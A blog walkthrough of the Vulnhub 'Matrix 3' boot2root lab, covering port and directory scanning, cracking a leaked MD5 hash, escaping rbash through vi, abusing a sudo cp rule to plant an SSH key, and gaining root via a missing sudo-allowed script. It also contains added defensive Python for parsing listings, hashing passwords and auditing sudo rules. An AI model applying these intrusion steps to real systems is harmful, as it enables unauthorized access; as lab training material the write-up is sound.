Matrix 3 Walkthrough

Mr. Robot
Published in InfoSec Adventures
8 min read · Jul 16, 2019

Description from Vulnhub:

Machine Details: Matrix is a medium level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networking: DHCP: Enabled IP Address: Automatically assigned

Hint: Follow your intuitions … and enumerate!

For walkthrough writeup permission or any other query, feel free to contact me on: Twitter: @unknowndevice64 or Email: info[@]ud64.com

I contacted the author via email to get his permission for this walkthrough and he granted it, so everything is fine!

Scanning

I started with the usual port scanning, which revealed 3 open ports.

root :: ~ » nmap -A -sC -sV -p- 192.168.42.230 
Nmap scan report for matrix (192.168.42.230)
Host is up (0.00020s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
6464/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
7331/tcp open caldav Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_ Basic realm=Login to Matrix
MAC Address: 08:00:27:43:E3:86 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

I typically start with the web server, because it’s the most likely entry point. I use a range of tools, but lately I’m getting comfortable with gobuster. It’s pretty fast and the latest update includes a lot of new features. You should definitely check it out!

root :: ~ » gobuster dir -u http://192.168.42.230 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                               
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.42.230
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/assets (Status: 301)
/Matrix (Status: 301)
Progress: 95610 / 220561 (43.35%)^C
[!] Keyboard interrupt detected, terminating.

The front page of the website.

I navigated to the /Matrix directory only to discover a ton of one-letter directories nested inside each other. I knew this must be the right path, so I decided to recursively download everything from that directory.

root :: Vulnhub/Matrix3 » wget -r http://192.168.42.230/Matrix/ 
--2019-07-16 17:11:55-- http://192.168.42.230/Matrix/
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 480 [text/html]
Saving to: ‘192.168.42.230/Matrix/index.html’
192.168.42.230/Matr 100%[===================>] 480 --.-KB/s in 0s
(46.6 MB/s) - ‘192.168.42.230/Matrix/index.html’ saved [480/480]
Loading robots.txt; please ignore errors.
http://192.168.42.230/robots.txt
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 404 File not found
2019-07-16 17:11:55 ERROR 404: File not found.
http://192.168.42.230/Matrix/4/
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 316 [text/html]
Saving to: ‘192.168.42.230/Matrix/4/index.html’
192.168.42.230/Matr 100%[===================>] 316 --.-KB/s in 0s
(77.5 MB/s) - ‘192.168.42.230/Matrix/4/index.html’ saved [316/316]
--- snip ---

I found multiple HTML files in these layered folders. There were quite a few, but I simply printed out every single one to check their contents.

root :: 192.168.42.230/Matrix » find . -type f -exec cat {} \;              
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/d/e/i/</title>
<body>
<h2>Directory listing for /Matrix/d/e/i/</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/d/e/y/</title>
<body>
<h2>Directory listing for /Matrix/d/e/y/</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
--- snip ---

I started looking through the output and noticed that one of the listings referenced an interesting file called secret.gz.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/n/e/o/6/4/</title>
<body>
<h2>Directory listing for /Matrix/n/e/o/6/4/</h2>
<hr>
<ul>
<li><a href="secret.gz">secret.gz</a>
</ul>
<hr>
</body>
</html>
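Reading hundreds of near-empty listings by eye is error-prone. The script below is an added example (not code from the original post) that parses the directory-listing HTML Python's SimpleHTTPServer produces, as mirrored by `wget -r`, and reports every entry that is a file rather than a subdirectory. The sample listings embedded in it are constructed copies of the ones shown above; the mirror path `192.168.42.230/Matrix` used as the default argument is assumed from the wget output.

```python
"""Parse Python SimpleHTTPServer directory listings mirrored with wget.

Added example for this walkthrough, not the author's code. It reads the
index.html files that `wget -r` saved under a local directory, extracts the
entries of each listing and reports the ones that are files, so a single
nested reference such as secret.gz does not have to be spotted by eye.
"""
import os
import sys
from html.parser import HTMLParser


class ListingParser(HTMLParser):
    """Collect href targets of <a> tags inside the <ul> of a listing."""

    def __init__(self):
        super().__init__()
        self.in_list = False
        self.entries = []

    def handle_starttag(self, tag, attrs):
        if tag == "ul":
            self.in_list = True
        elif tag == "a" and self.in_list:
            for name, value in attrs:
                if name == "href" and value:
                    self.entries.append(value)

    def handle_endtag(self, tag):
        if tag == "ul":
            self.in_list = False


def extract_entries(html):
    """Return (files, subdirectories) named in one listing page.

    SimpleHTTPServer appends '/' to directory entries, so the split only
    needs that trailing slash.
    """
    parser = ListingParser()
    parser.feed(html)
    files = [e for e in parser.entries if not e.endswith("/")]
    dirs = [e.rstrip("/") for e in parser.entries if e.endswith("/")]
    return files, dirs


def find_files(mirror_root):
    """Walk a wget mirror and return (listing directory, file entry) pairs."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(mirror_root):
        if "index.html" not in filenames:
            continue
        path = os.path.join(dirpath, "index.html")
        with open(path, encoding="utf-8", errors="replace") as fh:
            files, _dirs = extract_entries(fh.read())
        for name in files:
            found.append((os.path.relpath(dirpath, mirror_root), name))
    return found


# Constructed samples: the listing shown in the walkthrough, and one that
# only contains subdirectories.
SAMPLE_WITH_FILE = """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/n/e/o/6/4/</title>
<body>
<h2>Directory listing for /Matrix/n/e/o/6/4/</h2>
<hr>
<ul>
<li><a href="secret.gz">secret.gz</a>
</ul>
<hr>
</body>
</html>"""

SAMPLE_WITH_SUBDIRS = """<html><body><ul>
<li><a href="e/">e/</a>
<li><a href="o/">o/</a>
</ul></body></html>"""


if __name__ == "__main__":
    # Assumed default: the directory wget -r created for this host.
    root = sys.argv[1] if len(sys.argv) > 1 else "192.168.42.230/Matrix"
    for listing, name in find_files(root):
        print(f"{listing}/{name}")
```

Run it with the mirror directory as its only argument; each line of output is a listing directory followed by a file entry found there, which for this machine is the single `n/e/o/6/4/secret.gz`.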

I copied the URL and downloaded the file. It wasn’t compressed despite the extension.

root :: Vulnhub/Matrix3 » cat secret.gz             
admin:76a2173be6393254e72ffa4d6df1030a

Looks like a username and a hash. Let’s verify it! I copied the hash into a file and counted the characters.

root :: Vulnhub/Matrix3 » cat hash.txt| wc -c                  
33

33 indicated that we’re dealing with an MD5 hash: wc -c counts the trailing newline, so the hash itself is 32 hex characters, the length of an MD5 digest. Time for some password cracking!

root :: Vulnhub/Matrix3 » john hash.txt --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
passwd (?)
1g 0:00:00:00 DONE 2/3 2.173g/s 5843p/s 5843c/s 5843C/s chacha..nermal
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
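The following added example (not code from the original post) puts the hash-length reasoning into a function, checks the recovered value against the digest with a single hashlib call, and contrasts that with the salted, iterated PBKDF2 scheme a credential store should use instead. The `admin:...` line is a constructed copy of secret.gz's contents, and the iteration count is an assumed tuning value chosen for this example.

```python
"""Identify a bare digest by its length and contrast unsalted MD5 with a
salted, slow password hash.

Added example for this walkthrough, not the author's code. Checking a
candidate against an unsalted MD5 is one hash computation with nothing to
look up, which is why john finished in under a second; a salted PBKDF2
record forces one slow derivation per candidate per user instead.
"""
import hashlib
import hmac
import os

# Hex digest length -> common algorithms of that size (candidates, not proof).
DIGEST_LENGTHS = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1"],
    56: ["SHA-224"],
    64: ["SHA-256"],
    96: ["SHA-384"],
    128: ["SHA-512"],
}

# Constructed copy of the secret.gz line, newline included as wc -c saw it.
SECRET_LINE = "admin:76a2173be6393254e72ffa4d6df1030a\n"


def parse_credential_line(line):
    """Split a 'user:digest' line, dropping the newline wc -c counted."""
    user, _, digest = line.strip().partition(":")
    if not user or not digest:
        raise ValueError("expected user:digest")
    return user, digest.lower()


def classify_digest(digest):
    """Return candidate algorithms for a hex digest, or [] if not hex."""
    try:
        int(digest, 16)
    except ValueError:
        return []
    return DIGEST_LENGTHS.get(len(digest), [])


def verify_unsalted_md5(candidate, digest):
    """One hash computation is all an unsalted MD5 check costs."""
    computed = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(computed, digest)


# --- what a password store should look like instead -----------------------
PBKDF2_ITERATIONS = 200_000  # assumed tuning value for this example


def store_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex' for storage."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${derived.hex()}"


def verify_password(password, stored):
    """Recompute PBKDF2 with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, hash_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(derived.hex(), hash_hex)


if __name__ == "__main__":
    user, digest = parse_credential_line(SECRET_LINE)
    print(user, classify_digest(digest))          # admin ['MD5', 'NTLM', 'MD4']
    print(verify_unsalted_md5("passwd", digest))  # True: the value john recovered
    record = store_password("passwd")
    print(record)
    print(verify_password("passwd", record), verify_password("wrong", record))
```

Length alone only narrows the field (NTLM and MD4 digests are also 32 hex characters), so the classifier returns candidates rather than a verdict; the format john was told to use is what confirms it.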

Success! Now we have the required credentials and can use them to log in on port 7331. After logging in, there is not much to see. Maybe more hidden directories? Only one way to find out… But what about the authentication, you may ask? I captured the login request in Burp Suite, which showed that the service uses HTTP Basic authentication (an Authorization header on each request). With this in mind, fire up our trusty gobuster! Just specify the -U switch for the username and -P for the password and it will automatically add the Authorization header to every request it sends.

root :: Vulnhub/Matrix3 » gobuster dir -u http://192.168.42.230:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U admin -P passwd
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.42.230:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Auth User: admin
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/data (Status: 301)
/assets (Status: 301)
Progress: 2567 / 220561 (1.16%)^C
[!] Keyboard interrupt detected, terminating.

I got another interesting directory called data. Sweet, a binary file!

root :: ~/Downloads » file data 
data: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

I discovered that the executable is for Windows and was probably written in C#. The strings command didn’t show anything useful, so I copied it to my Windows machine and opened the file with ILSpy, which is a handy .NET decompiler.

Hard-coded credentials inside the executable.

Alright, I think we’re progressing pretty well. These are the login credentials for the SSH service.

SSH Access

root :: Vulnhub/Matrix3 » ssh guest@192.168.42.230 -p 6464
The authenticity of host '[192.168.42.230]:6464 ([192.168.42.230]:6464)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.42.230]:6464' (ECDSA) to the list of known hosts.
guest@192.168.42.230's password:
Last login: Thu Apr 4 10:24:06 2019 from 192.168.56.103
guest@matrix:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names

Not so fast though… We’re in a restricted shell called rbash. Fortunately, it’s easy to escape. I mean, relatively. The $PATH environment variable is set to /home/guest/prog and I couldn’t figure out what was inside it because of the lack of commands. I tried different escape techniques and got lucky with the vi editor: I typed :!/bin/bash instead of the :wq reflex 😄 It worked! After that, my first task was to change $PATH back and make the shell usable.

guest@matrix:~$ echo $PATH
/home/guest/prog
guest@matrix:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Privilege Escalation

With the help of a little enumeration, I found out that we can run the /bin/cp command as trinity without a password. Now, how to turn this to our advantage? I admit I had to think a little bit… but now it’s obvious.

guest@matrix:~$ sudo -l
User guest may run the following commands on matrix:
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp

We can use this to generate a new SSH key pair and copy the public key to trinity’s authorized_keys file. This way, we can switch user and escalate our privileges without a password.

guest@matrix:~/.ssh$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/guest/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/guest/.ssh/id_rsa.
Your public key has been saved in /home/guest/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:J54RvTiYeg9rIM4zQr7ML3S/6ad3mDuNDKRfszmPkpY guest@matrix
The key's randomart image is:
+---[RSA 2048]----+
| |
| . |
| . . |
| . o o . |
| o o S o |
| o.o.o + * |
|+o..+.O @ |
|+o= Eo/.o |
| =++o*BoB. |
+----[SHA256]-----+
guest@matrix:~/.ssh$ ls -la
total 20
drwx------ 2 guest users 4096 Jul 16 23:15 ./
drwxr-xr-x 18 guest users 4096 Apr 3 13:18 ../
-rw------- 1 guest users 1679 Jul 16 23:15 id_rsa
-rw-r--r-- 1 guest users 394 Jul 16 23:15 id_rsa.pub
-rw-r--r-- 1 guest users 171 Aug 6 2018 known_hosts
guest@matrix:~/.ssh$ chmod 777 id_rsa.pub
guest@matrix:~/.ssh$ cd ..
guest@matrix:~$ cd Documents/
guest@matrix:~/Documents$ cp ~/.ssh/id_rsa.pub .
guest@matrix:~/Documents$ sudo -u trinity /bin/cp id_rsa.pub /home/trinity/.ssh/authorized_keys
guest@matrix:~/Documents$ ssh trinity@localhost -p 6464
Last login: Mon Aug 6 16:37:45 2018 from 192.168.56.102
trinity@matrix:~$

Getting Root Access

We’re one step closer to root access, but we are not there yet. As you can see, trinity can run the /home/trinity/oracle command as root without a password. However, the file is not there.

trinity@matrix:~$ sudo -l
User trinity may run the following commands on matrix:
(root) NOPASSWD: /home/trinity/oracle
trinity@matrix:~$ ls -la
total 72
drwxr-xr-x 14 trinity trinity 4096 Apr 3 06:48 ./
drwxr-xr-x 7 root root 4096 Aug 6 2018 ../
-rw------- 1 trinity trinity 52 Aug 6 2018 .Xauthority
-rw------- 1 trinity trinity 6 Apr 3 14:44 .bash_history
drwxr-xr-x 5 trinity trinity 4096 Aug 6 2018 .cache/
drwxr-xr-x 11 trinity trinity 4096 Aug 6 2018 .config/
drwx------ 3 trinity trinity 4096 Aug 6 2018 .dbus/
-rw------- 1 trinity trinity 16 Aug 6 2018 .esd_auth
-rw-r--r-- 1 trinity trinity 3729 Oct 23 2017 .screenrc
drwxr-xr-x 2 trinity trinity 4096 Jul 16 23:18 .ssh/
drwx------ 4 trinity trinity 4096 Aug 6 2018 .thumbnails/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Desktop/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Documents/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Downloads/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Music/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Pictures/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Public/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Videos/

It’s easy! Just create a simple shell script that executes bash; since it runs as root, we get a root shell. Piece of cake!

I opened the vi editor one more time to create the oracle file. Don’t forget to make it executable, otherwise it doesn’t work!

trinity@matrix:~$ cat oracle 
/bin/bash
trinity@matrix:~$ sudo /home/trinity/oracle
sudo: /home/trinity/oracle: command not found
trinity@matrix:~$ chmod +x oracle
trinity@matrix:~$ sudo /home/trinity/oracle
root@matrix:/home/trinity# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@matrix:/home/trinity# whoami
root
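Both privilege escalations on this machine come from sudoers rules that should never have passed review: a NOPASSWD rule for a file-copying utility (which is what let guest drop a public key into trinity's authorized_keys), and a NOPASSWD rule whose target binary does not exist and sits in the invoking user's own home directory (the missing /home/trinity/oracle). The script below is an added example (not code from the original post) that parses `sudo -l` style output and flags exactly those conditions, so an administrator can catch them before anyone else does. The sample lines are constructed copies of the two `sudo -l` outputs above; the list of file-writing utilities and the finding wording are this example's own.

```python
"""Audit `sudo -l` output for rules that hand one account to another.

Added example for this walkthrough, not the author's code. It parses lines
in the format sudo -l prints ('(runas) NOPASSWD: /path') and flags the two
weaknesses this machine relies on: a NOPASSWD rule for a utility that
writes arbitrary files, and a rule whose target is missing or lives in a
directory the invoking user can write to. assess_rule() is pure so it can
be tested without the real filesystem; audit() applies it with os.path.
"""
import os
import re

# Utilities that copy or write files; a NOPASSWD rule for any of them is
# equivalent to granting the run-as user's file permissions outright.
FILE_WRITE_UTILITIES = {"cp", "mv", "tee", "dd"}

RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_line(line):
    """Parse one rule line; returns (runas, nopasswd, command) or None."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip(":").upper() for t in m.group("tags").split() if t.strip(":")}
    return m.group("runas"), "NOPASSWD" in tags, m.group("cmd").split()[0]


def assess_rule(runas, nopasswd, command, exists, parent_writable):
    """Return a list of findings for one parsed rule (pure function)."""
    findings = []
    name = os.path.basename(command)
    if nopasswd and name in FILE_WRITE_UTILITIES:
        findings.append(f"NOPASSWD {name} as {runas}: writes files with {runas}'s permissions")
    if not exists:
        findings.append(f"{command}: target missing; whoever can create it runs as {runas}")
    if parent_writable:
        findings.append(f"{command}: parent directory writable by the invoking user")
    if not command.startswith("/"):
        findings.append(f"{command}: relative command resolves via PATH")
    return findings


def audit(lines):
    """Apply assess_rule to sudo -l output using the local filesystem."""
    report = {}
    for line in lines:
        parsed = parse_sudo_line(line)
        if parsed is None:
            continue
        runas, nopasswd, command = parsed
        exists = os.path.exists(command)
        parent = os.path.dirname(command) or "."
        parent_writable = os.access(parent, os.W_OK)
        findings = assess_rule(runas, nopasswd, command, exists, parent_writable)
        if findings:
            report[command] = findings
    return report


# Constructed sample: the two sudo -l outputs shown in the walkthrough.
SAMPLE_SUDO_L = [
    "User guest may run the following commands on matrix:",
    "    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper",
    "    (trinity) NOPASSWD: /bin/cp",
    "User trinity may run the following commands on matrix:",
    "    (root) NOPASSWD: /home/trinity/oracle",
]

if __name__ == "__main__":
    for command, findings in audit(SAMPLE_SUDO_L).items():
        for finding in findings:
            print(finding)
```

The existence and writability checks only mean something when run on the host itself as the user the rule applies to, which is how audit() is meant to be used; on any other machine those two findings reflect that machine's filesystem, not the target's.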

The Flag

Finally, the most important thing is to print out the flag for the sake of our satisfaction and joy.

root@matrix:~# cat flag.txt
,----------------,              ,---------,
,-----------------------, ," ,"|
," ,"| ," ," |
+-----------------------+ | ," ," |
| .-----------------. | | +---------+ |
| | | | | | -==----'| |
| | Matrix is | | | | | |
| | compromised | | |/----|`---= | |
| | C:\>_reload | | | ,/|==== ooo | ;
| | | | | // |(((( [33]| ,"
| `-----------------' |," .;'| |(((( | ,"
+-----------------------+ ;; | | |," -morpheus AKA (unknowndevice64)-
/_)______________(_/ //' | +---------+
___________________________/___ `,
/ oooooooooooooooo .o. oooo /, \,"-----------
/ ==ooooooooooooooo==.o. ooo= // ,`\--{)B ,"
/_==__==========__==_ooo__ooo=_/' /___________,"
`-----------------------------'
-[ 7h!5 !5 n07 7h3 3nd, m47r!x w!11 r37urn ]-

Before You Go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏

Mr. Robot
InfoSec Adventures

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.